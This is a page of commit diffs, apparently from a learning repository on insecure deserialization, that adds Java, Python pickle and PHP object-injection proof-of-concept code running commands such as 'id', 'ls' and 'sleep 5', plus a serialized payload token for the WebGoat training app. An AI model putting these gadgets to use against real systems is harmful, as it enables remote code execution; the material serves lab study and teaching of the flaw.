testrod · July 31, 2020 22:15 · Feb 28, 2020 · Feb 28, 2020 · Feb 26, 2020 · Feb 26, 2020
diff --git a/deserialization-token b/deserialization-token
@@ -1 +1,2 @@
+The token will not work because the vulnerable class checks if the token is older than 10 minutes. You need to generate one yourself using the instructions on the blog post: https://thehackerish.com/insecure-deserialization-explained-with-examples
 rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAICAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfkAhoPDgwkiz74eHQAB3NsZWVwIDV0AAVkdW1teQ==
diff --git a/JavaDeserial.java b/JavaDeserial.java
@@ -3,7 +3,7 @@ public class JavaDeserial{
 
     public static void main(String args[]) throws Exception{
 
-        FileInputStream fis = new FileInputStream("normalObj.serial");
+        FileInputStream fis = new FileInputStream("/tmp/normalObj.serial");
         ObjectInputStream ois = new ObjectInputStream(fis);
 
         NormalObj unserObj = (NormalObj)ois.readObject();

diff --git a/JavaSerial.java b/JavaSerial.java
@@ -6,7 +6,7 @@ public static void main(String args[]) throws Exception{
 
         VulnObj vulnObj = new VulnObj("ls");
 
-        FileOutputStream fos = new FileOutputStream("normalObj.serial");
+        FileOutputStream fos = new FileOutputStream("/tmp/normalObj.serial");
         ObjectOutputStream os = new ObjectOutputStream(fos);
         os.writeObject(vulnObj);
         os.close();

diff --git a/deserialization-token b/deserialization-token
@@ -0,0 +1 @@
+rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAICAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfkAhoPDgwkiz74eHQAB3NsZWVwIDV0AAVkdW1teQ==
diff --git a/python-deserialize.py b/python-deserialize.py
@@ -1,4 +1,4 @@
 import pickle
 
-with open('serial', 'r') as f:
+with open('/tmp/serial', 'r') as f:
     pickle.loads(f.read())
diff --git a/python-serialize.py b/python-serialize.py
@@ -1,6 +1,10 @@
+import pickle
+
 class VulnPickle(object):
     def __reduce__(self):
         import os
         return (os.system,("id",))
 
 a = pickle.dumps(VulnPickle())
+with open('/tmp/serial', 'w') as f:
+    f.write(a)
diff --git a/JavaDeserial.java b/JavaDeserial.java
@@ -0,0 +1,39 @@
+import java.io.*;
+public class JavaDeserial{
+
+    public static void main(String args[]) throws Exception{
+
+        FileInputStream fis = new FileInputStream("normalObj.serial");
+        ObjectInputStream ois = new ObjectInputStream(fis);
+
+        NormalObj unserObj = (NormalObj)ois.readObject();
+        ois.close();
+    }
+}
+
+class NormalObj implements Serializable{
+    public String name;
+    public NormalObj(String name){
+    this.name = name;
+    }
+    private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException{
+        in.defaultReadObject();
+        System.out.println(this.name);
+    }
+}
+
+class VulnObj implements Serializable{
+    public String cmd;
+    public VulnObj(String cmd){
+    this.cmd = cmd;
+    }
+    private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException{
+        in.defaultReadObject();
+    String s = null;
+        Process p = Runtime.getRuntime().exec(this.cmd);
+        BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
+        while ((s = stdInput.readLine()) != null) {
+            System.out.println(s);
+        }
+    }
+}
diff --git a/JavaSerial.java b/JavaSerial.java
@@ -0,0 +1,21 @@
+import java.io.*;
+
+public class JavaSerial{
+
+    public static void main(String args[]) throws Exception{
+
+        VulnObj vulnObj = new VulnObj("ls");
+
+        FileOutputStream fos = new FileOutputStream("normalObj.serial");
+        ObjectOutputStream os = new ObjectOutputStream(fos);
+        os.writeObject(vulnObj);
+        os.close();
+
+    }
+}
+class VulnObj implements Serializable{
+    public String cmd;
+    public VulnObj(String cmd){
+    this.cmd = cmd;
+}
+}
diff --git a/WebGoat-deserialization-poc.java b/WebGoat-deserialization-poc.java
@@ -0,0 +1,16 @@
+package org.dummy.insecure.framework;
+
+import java.io.FileOutputStream;
+import java.io.ObjectOutputStream;
+
+public class Attack {
+   public static void main(String args[]) throws Exception{
+
+       VulnerableTaskHolder vulnObj = new VulnerableTaskHolder("dummy", "sleep 5");
+       FileOutputStream fos = new FileOutputStream("serial");
+       ObjectOutputStream os = new ObjectOutputStream(fos);
+       os.writeObject(vulnObj);
+       os.close();
+
+   }
+}
diff --git a/python-deserialize.py b/python-deserialize.py
@@ -0,0 +1,4 @@
+import pickle
+
+with open('serial', 'r') as f:
+    pickle.loads(f.read())
diff --git a/python-serialize.py b/python-serialize.py
@@ -0,0 +1,6 @@
+class VulnPickle(object):
+    def __reduce__(self):
+        import os
+        return (os.system,("id",))
+
+a = pickle.dumps(VulnPickle())
diff --git a/php-object-injection-example-deserialize.php b/php-object-injection-example-deserialize.php
@@ -0,0 +1,24 @@
+class DangerousClass {
+
+    function __construct() {
+        $this->cmd = "id";
+    }
+
+    function __destruct() {
+        echo passthru($this->cmd);
+    }
+
+}
+class NormalClass {
+
+    function __construct() {
+        $this->name = "bob";
+    }
+
+    function __destruct() {
+        echo $this->name;
+    }
+
+}
+$serial = file_get_contents('/tmp/serial');
+unserialize($serial);
diff --git a/php-object-injection-example-serialize.php b/php-object-injection-example-serialize.php
@@ -0,0 +1,14 @@
+class DangerousClass {
+
+    function __construct() {
+        $this->cmd = "ls";
+    }
+
+    function __destruct() {
+        echo passthru($this->cmd);
+    }
+
+}
+$a = new DangerousClass();
+$b = serialize($a);
+file_put_contents("/tmp/serial", $b);
Original file line number	Diff line number	Diff line change
		@@ -1 +1,2 @@
		The token will not work because the vulnerable class checks if the token is older than 10 minutes. You need to generate one yourself using the instructions on the blog post: https://thehackerish.com/insecure-deserialization-explained-with-examples
		rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAICAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfkAhoPDgwkiz74eHQAB3NsZWVwIDV0AAVkdW1teQ==
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1 @@
		rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAICAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfkAhoPDgwkiz74eHQAB3NsZWVwIDV0AAVkdW1teQ==